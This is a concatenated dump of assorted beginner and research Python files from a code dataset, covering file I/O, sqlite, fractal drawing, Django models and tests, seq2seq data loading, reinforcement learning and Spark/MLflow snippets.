in file_names:\n process(file)\n # process(\"e_so_many_books.txt\")\n toc = time.perf_counter()\n print(f\"Finished in {toc-tic}\")\n from test import main as test\n test(\"out2\")\n\n\n","sub_path":"books2.py","file_name":"books2.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"524742131","text":"\"\"\"\nPython makes performing file I/O simple. Take a look\nat how to read and write to files here:\n\nhttps://docs.python.org/3/tutorial/inputoutput.html#reading-and-writing-files\n\"\"\"\n\n# Open up the \"foo.txt\" file (which already exists) for reading\n# Print all the contents of the file, then close the file\n# Note: pay close attention to your current directory when trying to open \"foo.txt\"\n\n# YOUR CODE HERE\nimport os.path\nmy_path = os.path.dirname(__file__)\nfoo_path = os.path.join(my_path, 'foo.txt')\n\nwith open(foo_path) as f:\n print('Contents of \\'foo.txt\\':')\n for line in f:\n print(' ' + line, end='')\n\nf.close()\n\n# Open up a file called \"bar.txt\" (which doesn't exist yet) for\n# writing. Write three lines of arbitrary content to that file,\n# then close the file. Open up \"bar.txt\" and inspect it to make\n# sure that it contains what you expect it to contain\n\n# YOUR CODE HERE\narbitrary_text = '''A shrubbery!.\nWe are the Knights Who Say \"Ni!\"\nDeath awaits you all with nasty, big, pointy teeth.'''\n\nbar_path = os.path.join(my_path, 'bar.txt')\n\n# Create (or overrite existing) file and write arbitrary text\nwith open(bar_path, 'w') as f:\n f.write(arbitrary_text)\n\nf.close()\n\n# Open newly created file and print its contents\nwith open(bar_path) as f:\n print('\\nContents of \\'bar.txt\\':')\n for line in f:\n print(' ' + line, end='')\n\nf.close()","sub_path":"src/13_file_io.py","file_name":"13_file_io.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"539486927","text":"# Given two .txt files that have lists of numbers in them, find the numbers that are overlapping. One .txt file has a list of all prime numbers under 1000, and the other .txt file has a list of happy numbers up to 1000.\n\nlist1 = []\nlist2 = []\nwith open(\"primenumbers.txt\", \"r\") as fin:\n\tfor num in fin.read().split(\"\\n\"):\n\t\tlist1.append( int(num) )\nwith open(\"happynumbers.txt\", \"r\") as fin:\n\tfor num in fin.read().split(\"\\n\"):\n\t\tlist2.append( int(num) )\n\t\t\t\nlist3 = [item for item in list1 if item in list2]\nprint( \"found \" + str(len(list3)) + \" overlaps\" )\nprint( list3 )\n\nprint([ int(line) for line in open('happynumbers.txt','r') for sec in open('primenumbers.txt','r') if int(line) == int(sec) ])","sub_path":"pythonFun/A23_FileOverlap.py","file_name":"A23_FileOverlap.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"636665136","text":"import sqlite3\n\nconn = sqlite3.connect('satnight.db')\nc = conn.cursor()\n\nc.execute(\n '''\n CREATE TABLE IF NOT EXISTS beers (\n id INTEGER PRIMARY KEY,\n brand TEXT,\n description TEXT,\n drinkable INTEGER\n )\n '''\n)\n\nstarter_beers = [\n (1, 'guinness', 'thick and delicious', True),\n (2, 'modelo', 'its modelo time', True),\n (3, 'coors', 'dads favorite', False),\n]\n\nc.executemany('''INSERT INTO beers VALUES (?, ?, ?, ?)''', starter_beers)\n\nconn.commit()\nconn.close()\n","sub_path":"api/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"196542897","text":"# Reverse Sierpinski triangle\n# Triangles are equilateral, so triangle height (h) is:\n# a * sqr(0,75), or a * 0,866\n\nfrom tkinter import *\n\nroot = Tk()\nw = 667\nh = 0.866\ncanvas = Canvas(root, width=w, height=w*h, bg=\"black\")\ncanvas.pack()\n\ndef draw_eq_triangle(x, y, a, line_color):\n\n topleft = x, y\n topright = x + a, y\n bottom = x + (1/2 * a), y + (a * h)\n\n canvas.create_polygon(topleft, topright, bottom, fill='black', outline=line_color)\n\ndef reverse_sierpinski(x, y, a, fractal_color, depth):\n draw_eq_triangle(x, y, a, fractal_color)\n if a > depth:\n reverse_sierpinski(x, y, a/2, fractal_color, depth)\n reverse_sierpinski(x + a/2, y, a/2, fractal_color, depth)\n reverse_sierpinski(x + a/4, y + a/2 * h, a/2, fractal_color, depth)\n #reverse_sierpinski(x + a*(3/8), y + (a/4 * h), a/4, fractal_color, depth)\n\n# animation and coloring\nscale = 1\ncolor = 100\nfractal_w = 100\n\nfor i in range(1, 3000):\n fractal_w += 50\n if fractal_w > 2*w:\n fractal_w = w\n canvas.update()\n\n color += 20\n if scale == 6:\n scale = 1\n if color >= 256:\n color = 100\n scale += 1\n\n if scale == 1:\n col_r = color\n col_g = 0\n col_b = 0\n if scale == 2:\n col_r = 255\n col_g = color\n col_b = 0\n if scale == 3:\n col_r = 0\n col_g = color\n col_b = 0\n if scale == 4:\n col_r = 0\n col_g = 255\n col_b = color\n if scale == 5:\n col_r = 0\n col_g = 0\n col_b = color\n\n level_color = '#%02x%02x%02x' % (col_r, col_g, col_b)\n\n reverse_sierpinski(0, 0, fractal_w, level_color, 5)\n # print(fractal_w)\n canvas.update()\n\nroot.mainloop()\n","sub_path":"week-04/day-5/reverse_sierpinski_endless_colors.py","file_name":"reverse_sierpinski_endless_colors.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"221842981","text":"from __future__ import unicode_literals\n\nfrom django.db import models\n# Import django modules\nfrom django.contrib.gis.db import models\nfrom django.contrib.postgres.fields import ArrayField\n\n#note, this code was developed initially using a tutorial. the objects field within a model allows special spatial functions to be used. Not used for now but could be powerful in the future\n\nclass Waypoint(models.Model):\n \n name = models.CharField(max_length=32)\n geometry = models.PointField(srid=4326)\n objects = models.GeoManager()\n date = models.DateTimeField()\n\n def __unicode__(self):\n return '%s at %s %s on %s' % (self.name, self.geometry.x, self.geometry.y,self.date.strftime(\"%Y-%m-%d %H:%M:%S\"))\n# Create your models here.\n\nclass Dataset(models.Model):\n name = models.CharField(max_length=32)\n points = ArrayField(ArrayField(models.FloatField()))\n dates = ArrayField(models.DateTimeField())\n objects = models.GeoManager()\n\nclass ClusterResult(models.Model):\n clusteringType = models.CharField(max_length=32)\n uniqueLabels = ArrayField(models.IntegerField())\n labels = ArrayField(models.IntegerField())\n date = models.DateTimeField()\n dataset = models.ForeignKey(Dataset, on_delete=models.CASCADE)\n","sub_path":"webApp/viewMap/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"351837757","text":"import pickle\nimport os\nimport random\nimport numpy as np\nimport copy\nimport nltk\n\n\ndef build_vocab(filenames, word=True):\n \"\"\"\n Build vocabulary from a list of files\n\n ----------\n @params\n filenames: list of string, input filenames\n\n @return\n vocab: dict, pairs of char tokens and their indices\n idx2char: list, mapping index to character\n\n For word == True, return source and target languages separately\n ----------\n \"\"\"\n vocab = {\n \"\" : 0,\n \"\" : 1,\n \"\" : 2, \n \"\" : 3,\n }\n idx2char = [\"\", \"\", \"\", \"\"]\n\n if word:\n thres = 5\n src_wc = {}\n tar_wc = {}\n\n for filename in filenames:\n with open(filename, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n source, target = line.strip().split(\"\")\n source = source[:-5].strip().lower()\n target = target[:-5].strip().lower()\n\n if word:\n for w in nltk.word_tokenize(source):\n src_wc[w] = src_wc.get(w, 0) + 1\n\n for w in nltk.word_tokenize(target):\n tar_wc[w] = tar_wc.get(w, 0) + 1\n\n else:\n for c in source + target:\n if c not in vocab:\n vocab[c] = len(vocab)\n idx2char.append(c)\n\n if word:\n\n def _trim(wc, min_count):\n trimmed_vocab = copy.deepcopy(vocab)\n trimmed_idx2token = copy.deepcopy(idx2char)\n\n for w, c in wc.items():\n if c >= min_count:\n trimmed_vocab[w] = len(trimmed_vocab)\n trimmed_idx2token.append(w)\n\n return trimmed_vocab, trimmed_idx2token\n\n src_vocab, src_idx2token = _trim(src_wc, thres)\n tar_vocab, tar_idx2token = _trim(tar_wc, thres)\n\n return src_vocab, src_idx2token, tar_vocab, tar_idx2token\n\n return vocab, idx2char\n\n\ndef load_data(file_path, vocab, pickle_path, max_len, reverse_source):\n \"\"\"\n Load source and target language sequences, each list contains a list of \n character indices converted from vocabulary\n\n ----------\n @params\n file_path: string, input file path\n vocab: dict, the vocabulary generated from a large corpora\n pickle_path: string, the location of the pickled data\n max_len: int, the maximum source sequence length, used to filter longer \n sequences\n reverse_source: bool, reverse the source sentence order, which may \n improve the final performance of machine translation\n\n @return\n source_seqs: list, a list of source language sentence\n target_seqs: list, a list of target language sentence\n ----------\n \"\"\"\n\n def reverse_order(seq):\n for i in range(len(seq)):\n seq[i] = list(reversed(seq[i]))\n return seq\n\n def sort_seq(src_seq, tar_seq):\n # sort data by descending length order\n src_seq = np.array(srq_seq)\n tar_seq = np.array(tar_seq)\n\n src_lens = [len(d) for s in src_seq]\n order = np.argsort(src_lens)[::-1]\n\n return src_seq[order], tar_seq[order]\n\n if type(vocab) == list:\n pickle_path = pickle_path[:-2] + \"_word.p\"\n if os.path.exists(pickle_path.format(\"source\")):\n source_seqs = pickle.load(open(pickle_path.format(\"source\"), \"rb\"))\n target_seqs = pickle.load(open(pickle_path.format(\"target\"), \"rb\"))\n\n if reverse_source:\n source_seqs = reverse_order(source_seqs)\n \n return sort_seq(source_seqs, target_seqs)\n\n source_seqs = []\n target_seqs = []\n i = 0\n with open(file_path, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n source_seq = [1]\n target_seq = [1]\n\n source, target = line.strip().split(\"\")\n source = source[:-5].strip().lower()\n target = target[:-5].strip().lower()\n\n if len(source) <= max_len and len(source) >= max_len // 2:\n\n if type(vocab) == list:\n for w in nltk.word_tokenize(source):\n source_seq.append(vocab[0].get(w, vocab[0][\"\"]))\n source_seq.append(vocab[0][\"\"])\n\n for w in nltk.word_tokenize(target):\n target_seq.append(vocab[1].get(w, vocab[1][\"\"]))\n target_seq.append(vocab[1][\"\"])\n \n source_seqs.append(source_seq)\n target_seqs.append(target_seq)\n \n else:\n for c in source:\n source_seq.append(vocab[c])\n source_seq.append(vocab[\"\"])\n \n for c in target:\n target_seq.append(vocab[c])\n target_seq.append(vocab[\"\"])\n\n source_seqs.append(source_seq)\n target_seqs.append(target_seq)\n\n pickle.dump(source_seqs, open(pickle_path.format(\"source\"), \"wb\"))\n pickle.dump(target_seqs, open(pickle_path.format(\"target\"), \"wb\"))\n\n if reverse_source:\n source_seqs = reverse_order(source_seqs)\n\n return sort_seq(source_seqs, target_seqs)\n\n\ndef batchify(data, label, stride, batch_size=None, shuffle=False):\n \n if not batch_size:\n batch_size = len(data)\n\n data = np.array(data)\n label = np.array(label)\n\n data_size = len(data)\n order = list(range(data_size))\n if shuffle:\n random.shuffle(order)\n\n num_batches = int(np.ceil(1.*data_size / batch_size))\n \n for i in range(num_batches):\n \n start = i * batch_size\n indices = order[start: start+batch_size]\n\n padded_data, src_len, idx = pad_data(data[indices], stride)\n padded_label, label_mask = pad_label(label[indices][idx])\n \n yield padded_data, src_len, padded_label, label_mask\n \n\ndef pad_data(batch_data, stride):\n \"\"\"\n For source sequence data in a batch, \n zero-pad the short ones up to the multiples of stride, \n and sort descendantly by sequence length\n \n ----------\n @param \n batch_data: numpy array, has dimension (batch_size, seq_len)\n stride: int, stride size\n \n @return \n padded_data: numpy array, same format as batch_data, but padded\n seq_len: numpy array, the lengths of each sequence\n order: numpy array, the indices of items which are sorted descendantly\n ----------\n \"\"\"\n lens = [len(data) for data in batch_data]\n max_len = max(lens)\n if max_len % stride != 0:\n max_len += stride - (max_len % stride)\n\n batch_size = len(batch_data)\n n_tokens = len(batch_data[0])\n padded_data = np.zeros([batch_size, max_len], dtype=np.int32)\n seq_len = []\n \n for i in range(batch_size):\n length = len(batch_data[i])\n pad = np.pad(batch_data[i], (0, max_len-length), \"constant\")\n padded_data[i] = pad\n seq_len.append(length)\n\n order = np.flip(np.argsort(seq_len), 0) # sort descendantly\n\n return padded_data[order], np.array(seq_len)[order], order\n \n\ndef pad_label(batch_label):\n \"\"\"\n For target sequence data in a batch, \n zero-pad the short ones up to the max. length in the batch\n \n ----------\n @param \n batch_label: numpy array, has dimension (batch_size, seq_len)\n \n @return \n padded_label: numpy array, same format as batch_label, but padded\n label_mask: numpy array, the padded entries and the first entry \n are zeros.\n ----------\n \"\"\"\n lens = [len(data) for data in batch_label]\n max_len = max(lens)\n\n batch_size = len(batch_label)\n n_tokens = len(batch_label[0])\n padded_label = np.zeros([batch_size, max_len], dtype=np.int32)\n label_mask = np.zeros([batch_size, max_len])\n \n for i in range(batch_size):\n length = len(batch_label[i])\n pad = np.pad(batch_label[i], (0, max_len-length), \"constant\")\n padded_label[i] = pad\n label_mask[i,1:length] = 1\n\n return padded_label, label_mask\n\n\ndef convert2sequence(seq, idx2char, delimit=\" \"):\n output = []\n for i in seq:\n output.append(idx2char[i])\n if i == 2:\n break\n\n return delimit.join(output)\n\n\ndef loss_in_batch(output, label, mask, loss_fn):\n loss = 0\n for i in range(len(output)):\n loss += loss_fn(output[i:i+1], label[i:i+1]) * mask[i]\n return loss\n","sub_path":"CNN-ResNet-BiGRU/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"652206530","text":"import unittest\nimport requests\n\n\nclass TestBooks(unittest.TestCase):\n def setUp(self):\n self.base_url = 'http://pulse-rest-testing.herokuapp.com'\n self.part_url = '/books'\n self.book_id = None\n\n def test_book_create(self):\n book_data = {\"title\": \"Mu-Mu\", \"author\": \"Ivan Turgenev\"}\n res = requests.post(self.base_url + self.part_url, data=book_data)\n self.assertEqual(201, res.status_code)\n body = res.json()\n self.book_id = body['id']\n book_data['id'] = self.book_id\n self.assertEqual(body, book_data)\n\n def tearDown(self):\n if self.book_id is not None:\n requests.delete(f'{self.base_url}{self.part_url}/{self.book_id}')\n","sub_path":"test_book.py","file_name":"test_book.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"502416241","text":"#!env/bin/python\nfrom melonhub import db, bcrypt\nfrom melonhub.models import Product, Stock\nfrom datetime import datetime\n\nprint(\"==========\")\nprint(\"This script adds a product\")\nprint(\"==========\")\n\nproduct_choices = [\"Medical Melon\", \"Magical Melon\", \"Musical Melon\", \"Aqua Melon\", \"Master Melon\", \"Make-A-Melon\"]\nchoice = product_choices[int(input(\"Which product do you want to add? [0] Medical Melon, [1] Magical Melon, [2] Musical Melon, [3] Aqua Melon, [4] Master Melon, [5] Make-a-Melon: \"))]\n\nproduct = Product.query.filter_by(name=choice).first()\n\namount = int(input(\"How many {}s do you want to create: \".format(choice)))\n\nstock_id = int(input(\"To which stock do you want to add {} {}s: \".format(str(amount), choice)))\n\n# Retrieve stock corresponding to the given stock id\n# this stock is passed to the product.stock variable\nstock = Stock.query.get(stock_id)\n\nfor i in range(amount):\n\tp = Product()\n\tp.name = product.name\n\tp.desc_short = product.desc_short\n\tp.desc_long = product.desc_long\n\tp.price_in_cents = product.price_in_cents\n\tp.costs_in_cents = product.costs_in_cents\n\tp.date_of_prod = product.date_of_prod\n\tp.date_of_expiration = product.date_of_expiration\n\tp.weight_in_grams = product.weight_in_grams\n\tp.length_in_mm = product.length_in_mm\n\tp.width_in_mm = product.width_in_mm\n\tp.height_in_mm = product.height_in_mm\n\tp.percentage_water = product.percentage_water\n\tp.percentage_sugar = product.percentage_sugar\n\tp.energy_in_kj_per_100_grams = product.energy_in_kj_per_100_grams\n\tp.mg_vitamin_c = product.mg_vitamin_c\n\tp.stock = stock\n\n\tdb.session.add(p)\n\tdb.session.commit()\n","sub_path":"add_product.py","file_name":"add_product.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"495577801","text":"# python solve.py n10stg.csv N\n# read the strategy. and solve the optimality of the strategy instead of running simuations.\nfrom __future__ import print_function\nimport sys\nimport os\nimport string\nimport time\nimport random\nimport numpy\nfrom numpy import genfromtxt\nimport math\nimport json\nimport sim\nimport scipy.sparse\nimport scipy\nimport scipy.sparse.linalg\n\nP = 0.37\n\ndef solveSparseStrategy(stg,N):\n\teqns = scipy.sparse.lil_matrix( ( N+1 , N+1 ) )\n\tb = numpy.zeros( N+1 )\n\teqns[0,0] = 1.0\n\teqns[N,N] = 1.0\n\tb[0] = 0\n\tb[N] = 1\n\tfor i in xrange(N-1): # i = 0,1,...,N-2, X = 1,2,...,N-1\n\t\tX = i+1\n\t\tB = stg[X]\n\t\teqns[X,X - B] = 1.0 - P\n\t\teqns[X,X + B] = P\n\t\teqns[X,X] = -1.0\n\teqns = eqns.tocsr() # for efficiency\n\tx = scipy.sparse.linalg.spsolve(eqns, b)\n\treturn x\n\ndef solveStrategy(stg,N):\n\teqns = numpy.zeros( ( N+1 , N+1 ) )\n\tb = numpy.zeros( N+1 )\n\teqns[0][0] = 1.0\n\teqns[N][N] = 1.0\n\tb[0] = 0\n\tb[N] = 1\n\tfor i in xrange(N-1): # i = 0,1,...,N-2, X = 1,2,...,N-1\n\t\tX = i+1\n\t\tB = stg[X]\n\t\teqns[X][X - B] = 1.0 - P\n\t\teqns[X][X + B] = P\n\t\teqns[X][X] = -1.0\n\tx = numpy.linalg.solve(eqns, b)\n\treturn x\n\ndef output(stg,q0,N,csv_file):\n\twith open(csv_file, 'w') as the_file:\n\t\tfor i in xrange(N-1): # i = 0,1,...,N-2, X = 1,2,...,N-1\n\t\t\tX = i+1\n\t\t\t#stg[X] = [stg[X],q0[i]]\n\t\t\tprint(\"%u,%u,%.9f\"%(X,stg[X],q0[i]), file=the_file)\n\n\n\nif __name__ == \"__main__\":\n\tN = int(sys.argv[2])\n\tstg = sim.readStrategy(sys.argv[1],N)\n\n\tif N > 1000:\n\t\tq_vect = solveSparseStrategy(stg,N)\n\telse:\n\t\tq_vect = solveStrategy(stg,N)\n\tq0 = list(q_vect)\n\tq0 = q0[1:]\n\tq0 = q0[:-1]\n\toutput(stg,q0,N,sys.argv[1])\n\t#print q0\n\t#print \"Qs: %.9f\"%((sum(q_vect)-1.0)/(N-1))","sub_path":"solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"219109157","text":"import random\r\nimport time\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\nclass Env:\r\n def __init__(self):\r\n self.wind = [0, 0, 0, 1, 1, 1, 2, 2, 1, 0]\r\n\r\n def action_result(self, initial_location, action_taken):\r\n row, col = initial_location\r\n row = row - self.wind[col]\r\n if action_taken == 0:\r\n row -= 1\r\n elif action_taken == 1:\r\n col -= 1\r\n elif action_taken == 2:\r\n row += 1\r\n elif action_taken == 3:\r\n col += 1\r\n elif action_taken == 4:\r\n col += 1\r\n row -= 1\r\n elif action_taken == 5:\r\n col -= 1\r\n row -= 1\r\n elif action_taken == 6:\r\n col -= 1\r\n row += 1\r\n elif action_taken == 7:\r\n col += 1\r\n row += 1\r\n if row < 0:\r\n row = 0\r\n elif row > 6:\r\n row = 6\r\n if col < 0:\r\n col = 0\r\n elif col > 9:\r\n col = 9\r\n final_location = [row, col]\r\n return final_location\r\n\r\n\r\nclass State:\r\n def __init__(self, row, col):\r\n self.values = [0]*8\r\n self.coordinates = [row, col]\r\n\r\n\r\nclass Agent:\r\n def __init__(self):\r\n self.model = Env()\r\n self.row = 3\r\n self.col = 0\r\n self.episode_complete = False\r\n self.states = []\r\n the_row = []\r\n for i in range(7):\r\n for j in range(10):\r\n the_row.append(State(i, j))\r\n self.states.append(the_row)\r\n the_row = []\r\n self.current_state = self.states[self.row][self.col]\r\n self.next_state = self.states[self.row][self.col]\r\n\r\n def episode(self, step_size, gamma, display_actions):\r\n action_taken = 0\r\n while not self.episode_complete:\r\n if self.col == 7 and self.row == 3:\r\n self.episode_complete = True\r\n self.row = 3\r\n self.col = 0\r\n self.current_state = self.states[self.row][self.col]\r\n self.next_state = self.states[self.row][self.col]\r\n else:\r\n epsilon = 0.1\r\n if random.random() <= epsilon:\r\n action_taken = random.randint(0, 7)\r\n else:\r\n action_taken = self.current_state.values.index(max(self.current_state.values))\r\n\r\n if display_actions:\r\n # print(self.current_state.coordinates,self.next_state.coordinates)\r\n x_change = int(self.next_state.coordinates[1] - self.current_state.coordinates[1])\r\n if x_change < 0:\r\n file.write(\"W \")\r\n elif x_change > 0:\r\n file.write(\"E \")\r\n y_change = int(self.next_state.coordinates[0] - self.current_state.coordinates[0])\r\n if y_change < 0:\r\n for change in range(-y_change):\r\n file.write(\"N \")\r\n elif y_change > 0:\r\n for change in range(y_change):\r\n file.write(\"S \")\r\n\r\n final_loc = self.model.action_result([self.row, self.col], action_taken)\r\n self.row = final_loc[0]\r\n self.col = final_loc[1]\r\n self.next_state = self.states[self.row][self.col]\r\n\r\n q1 = epsilon * sum(self.current_state.values)/8 + (1 - epsilon) * max(self.current_state.values)\r\n q2 = gamma * (epsilon * sum(self.next_state.values)/8 + (1 - epsilon) * max(self.next_state.values))\r\n self.current_state.values[action_taken] += step_size * (-1 + q2 - q1)\r\n self.current_state = self.states[self.row][self.col]\r\n\r\n self.episode_complete = False\r\n\r\nfile = open(r\"King's Windy Solution.txt\", \"w\")\r\nagent = Agent()\r\nstep_size = 0.5\r\nstart_time = time.time()\r\ntimes = []\r\nfor i in range(150):\r\n times.append(500000 * (time.time() - start_time))\r\n agent.episode(0.5, 1, False)\r\nagent.episode(0.5, 1, True)\r\n\r\nepisodes = list(range(0, 150, 1))\r\nplt.xlabel(\"Time Steps\")\r\nplt.ylabel(\"Episodes\")\r\nplt.plot(times, episodes)\r\nplt.savefig(\"King's Windy World.png\", dpi=300, bbox_inches='tight')\r\n","sub_path":"Windy Gridworld/King's Windy World/KingWindyWorld.py","file_name":"KingWindyWorld.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"254882104","text":"from django.core.exceptions import ValidationError\n\nfrom tender.forms.forms import TenderModelForm\nfrom tender.tests.test_tender import TenderCoreTests\n\n\nclass TenderFormTests(TenderCoreTests):\n\n def test_form_valid_with_order(self):\n self.data['owner'] = self.user.pk\n order = self.req_fact.RequestFactory.create(number=1000)\n self.data['order'] = order.number\n form = TenderModelForm(self.data)\n self.assertTrue(form.is_valid())\n\n def test_form_validation_fails_with_order_not_exists(self):\n self.data['owner'] = self.user.pk\n order = self.req_fact.RequestFactory.create(number=1000)\n self.data['order'] = order.number\n order.delete()\n form = TenderModelForm(self.data)\n self.assertFalse(form.is_valid())\n self.assertRaisesMessage(ValidationError, expected_message='درخواستی با این شماره یافت نشد!')\n\n def test_form_valid_without_order(self):\n self.data['owner'] = self.user.pk\n form = TenderModelForm(self.data)\n self.assertTrue(form.is_valid())\n\n def test_save_form(self):\n self.data['owner'] = self.user.pk\n order = self.req_fact.RequestFactory.create(number=1000)\n self.data['order'] = order.number\n form = TenderModelForm(self.data)\n self.assertTrue(form.is_valid())\n tender = form.save()\n self.assertEqual(tender.order, order)\n","sub_path":"app/tender/tests/test_form.py","file_name":"test_form.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"199978547","text":"import numpy as np\nfrom torch import Tensor\nfrom torch.autograd import Variable\n\n\nclass ReplayBuffer(object):\n \"\"\"\n Replay Buffer for multi-agent RL with parallel rollouts\n \"\"\"\n\n def __init__(self,\n max_steps,\n num_agents,\n obs_dims,\n ac_dims):\n \"\"\"\n Inputs:\n max_steps (int): Maximum number of timepoints to store in buffer\n num_agents (int): Number of agents in environment\n obs_dims (list of ints): number of obervation dimensions for each\n agent\n ac_dims (list of ints): number of action dimensions for each agent\n \"\"\"\n self.max_steps = max_steps\n self.num_agents = num_agents\n obs_dims = obs_dims\n ac_dims = ac_dims\n\n # self.num_agents = num_agents\n self.obs_buffs = []\n self.ac_buffs = []\n self.rew_buffs = []\n self.next_obs_buffs = []\n self.done_buffs = []\n for odim, adim in zip(obs_dims, ac_dims):\n self.obs_buffs.append(np.zeros((max_steps, odim),\n dtype=np.float32))\n self.ac_buffs.append(np.zeros((max_steps, adim), dtype=np.float32))\n self.rew_buffs.append(np.zeros(max_steps, dtype=np.float32))\n self.next_obs_buffs.append(\n np.zeros((max_steps, odim), dtype=np.float32))\n self.done_buffs.append(np.zeros(max_steps, dtype=np.uint8))\n\n # index of first empty location in buffer (last index when full)\n self.filled_i = 0\n self.curr_i = 0 # current index to write to (ovewrite oldest data)\n\n return\n\n def __len__(self):\n return self.filled_i\n\n def push(self,\n observations,\n actions,\n rewards,\n next_observations,\n dones,\n accumulate=True,\n gamma=0.95):\n\n # nentries = observations.shape[1] \n nentries = 16\n\n if self.curr_i + nentries > self.max_steps:\n # num of indices to roll over\n rollover = self.max_steps - self.curr_i\n for agent_i in range(self.num_agents):\n self.obs_buffs[agent_i] = np.roll(self.obs_buffs[agent_i],\n rollover,\n axis=0)\n self.ac_buffs[agent_i] = np.roll(self.ac_buffs[agent_i],\n rollover,\n axis=0)\n self.rew_buffs[agent_i] = np.roll(self.rew_buffs[agent_i],\n rollover)\n self.next_obs_buffs[agent_i] = np.roll(\n self.next_obs_buffs[agent_i], rollover, axis=0)\n self.done_buffs[agent_i] = np.roll(self.done_buffs[agent_i],\n rollover)\n self.curr_i = 0\n self.filled_i = self.max_steps\n\n for agent_i in range(self.num_agents):\n # print(observations[agent_i].shape)\n self.obs_buffs[agent_i][self.curr_i:self.curr_i +\n nentries] = observations[agent_i]\n # actions are already batched by agent, so they are indexed differently\n self.ac_buffs[agent_i][self.curr_i:self.curr_i +\n nentries] = actions[agent_i]\n self.rew_buffs[agent_i][self.curr_i:self.curr_i +\n nentries] = rewards[agent_i]\n self.next_obs_buffs[agent_i][self.curr_i:self.curr_i +\n nentries] = next_observations[agent_i]\n self.done_buffs[agent_i][self.curr_i:self.curr_i +\n nentries] = dones[agent_i]\n\n self.curr_i += nentries\n if self.filled_i < self.max_steps:\n self.filled_i += nentries\n if self.curr_i == self.max_steps:\n self.curr_i = 0\n\n if accumulate:\n done_thread = np.argwhere(dones[0]).flatten()\n if len(done_thread) > 0:\n # print(done_thread)\n pass\n for thread in done_thread:\n accum_rwd, thd = np.zeros(self.num_agents), 16 - thread\n tmp = self.curr_i - thd - nentries\n accum_rwd += ([\n self.rew_buffs[i][self.curr_i - thd]\n for i in range(self.num_agents)\n ])\n\n while True:\n # print(tmp)\n # print(accum_rwd)\n accum_rwd = np.array([\n self.rew_buffs[i][tmp] for i in range(self.num_agents)\n ]) + accum_rwd * gamma\n for agent_i in range(self.num_agents):\n self.rew_buffs[agent_i][tmp] = accum_rwd[agent_i]\n tmp -= nentries\n if self.done_buffs[0][tmp]:\n break\n if tmp < 0 and self.filled_i == self.max_steps:\n tmp += self.max_steps\n # print(tmp)\n # print(nentries)\n # print(self.rew_buffs[0][tmp + np.arange(150) * nentries])\n return\n\n def sample(self, N, device='cpu', norm_rews=True):\n inds = np.random.choice(np.arange(self.filled_i), size=N, replace=True)\n # if to_gpu:\n # cast = lambda x: Variable(Tensor(x), requires_grad=False).cuda()\n # else:\n cast = lambda x: Variable(Tensor(x), requires_grad=False).to(device)\n if norm_rews:\n ret_rews = [\n cast((self.rew_buffs[i][inds] -\n self.rew_buffs[i][:self.filled_i].mean()) /\n (self.rew_buffs[i][:self.filled_i].std() + 1e-7))\n for i in range(self.num_agents)\n ]\n else:\n ret_rews = [\n cast(self.rew_buffs[i][inds]) for i in range(self.num_agents)\n ]\n\n obs_buffs = [\n cast(self.obs_buffs[i][inds]) for i in range(self.num_agents)\n ]\n ac_buffs = [\n cast(self.ac_buffs[i][inds]) for i in range(self.num_agents)\n ]\n next_obs_buffs = [\n cast(self.next_obs_buffs[i][inds]) for i in range(self.num_agents)\n ]\n done_buffs = [\n cast(self.done_buffs[i][inds]) for i in range(self.num_agents)\n ]\n\n return (obs_buffs, ac_buffs, ret_rews, next_obs_buffs, done_buffs)\n\n def get_average_rewards(self, N):\n if self.filled_i == self.max_steps:\n inds = np.arange(self.curr_i - N,\n self.curr_i) # allow for negative indexing\n else:\n inds = np.arange(max(0, self.curr_i - N), self.curr_i)\n return [self.rew_buffs[i][inds].mean() for i in range(self.num_agents)]\n","sub_path":"maac_team/utils/buffer.py","file_name":"buffer.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"239791929","text":"from pyspark.sql import SparkSession, functions as F\n# Load saved model with MLflow\nimport mlflow.spark\nimport os\n\nos.environ['MLFLOW_TRACKING_URI'] = 'http://localhost:5000/'\nos.environ['PYSPARK_PYTHON'] = 'python3'\nos.environ['PYSPARK_DRIVER_PYTHON'] = 'python3'\n# Generate predictions\nspark = (SparkSession.builder\n .appName(\"Spark Advertising Train Model\")\n .master(\"yarn\")\n .getOrCreate())\n\ninputDF = (spark\n .read\n .format(\"csv\")\n .option(\"inferSchema\",True)\n .option(\"header\", True)\n .option(\"sep\",\",\")\n .load(\"hdfs://localhost:9000/user/train/datasets/Advertising.csv\"))\n\n\nimport mlflow.pyfunc\n\ndata = inputDF.select(\"TV\",\"Radio\",\"Newspaper\").limit(5).toPandas()\n# You can leanr model name from 